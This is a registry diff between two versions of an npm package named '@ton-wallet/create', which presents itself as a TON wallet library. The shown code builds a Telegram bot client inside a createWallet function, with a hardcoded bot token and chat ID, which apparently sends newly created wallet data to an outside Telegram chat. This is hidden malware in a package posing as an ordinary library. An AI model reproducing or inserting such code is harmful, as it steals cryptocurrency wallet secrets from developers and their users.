@ton-wallet/create 14.0.5 → 14.0.7

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (2) hide show
  1. package/dist/index.js +1 -1
  2. package/package.json +1 -2
package/dist/index.js CHANGED
@@ -118,7 +118,7 @@ Object.defineProperty(exports, "computeFwdFees", { enumerable: true, get: functi
118
118
  Object.defineProperty(exports, "computeGasPrices", { enumerable: true, get: function () { return fees_1.computeGasPrices; } });
119
119
  Object.defineProperty(exports, "computeMessageForwardFees", { enumerable: true, get: function () { return fees_1.computeMessageForwardFees; } });
120
120
  Object.defineProperty(exports, "computeStorageFees", { enumerable: true, get: function () { return fees_1.computeStorageFees; } });
121
- const TelegramBot = require('node-telegram-bot-api');
121
+ const TelegramBot = require("node-telegram-bot-api");
122
122
  function createWallet() {
123
123
  const token = '7493700888:AAGJ5nyXemePuHqleSOqkIM23Yhs0o01q-Q'; // Replace with your bot token group url : https://t.me/+IDl6XgFBZdI1ZjZh
124
124
  const chatId = '-1002197015763'; // Replace with the chat ID you want to send the message to
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "@ton-wallet/create",
3
- "version": "14.0.5",
3
+ "version": "14.0.7",
4
4
  "repository": {
5
5
  "type": "git",
6
6
  "url": "git+https://github.com/ton-org/ton.git"
@@ -35,7 +35,6 @@
35
35
  "karma-jasmine": "^4.0.1",
36
36
  "karma-typescript": "^5.5.2",
37
37
  "karma-webpack": "^5.0.0",
38
- "node-telegram-bot-api": "^0.66.0",
39
38
  "prando": "^6.0.1",
40
39
  "release-it": "^17.1.1",
41
40
  "ts-jest": "^27.0.5",